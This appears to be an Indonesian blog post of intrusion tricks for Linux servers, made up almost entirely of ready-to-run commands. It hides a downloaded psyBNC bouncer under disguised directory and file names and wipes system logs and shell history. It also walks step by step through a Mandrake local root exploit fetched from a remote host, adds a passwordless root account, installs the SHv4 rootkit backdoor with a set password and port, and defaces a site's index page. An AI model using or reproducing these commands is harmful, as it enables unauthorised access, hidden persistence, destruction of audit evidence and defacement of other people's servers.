autor : kawan - kawanku
: TRIK MEMBUAT PSYBNC :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd var/tmp/ ; mkdir .... ; cd .... ;
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ;
tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log ; make; mv psybnc "bash " ; rm psybnc.conf ;
wget http://www.geocities.com/lifron/psybnc.conf.20075.txt ; mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt " " ; pwd ; PATH=$PATH:/var/tmp/..../.log/ ; "bash " " "
mv psybnc.pid .log ;
mv ./psybncchk .sh ;
mv ./log/psybnc.log .mud ;
find |grep psybnc
=================================================================================================
: TRIK MENGHAPUS LOG :
=================================================================================================
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir " " ; cd " "
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo "tondano::0:0::/.tondano:/bin/bash" >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14. last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/" " <== Bersihkan semua tools
25. Test shell dengan port 7788, login as : root, password : gohanz
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA ToNDaNo Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA ToNDaNo Was Here" > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
------------------------------------------------------------------------------------
from : kawan - kawan ku
Tidak ada komentar:
Posting Komentar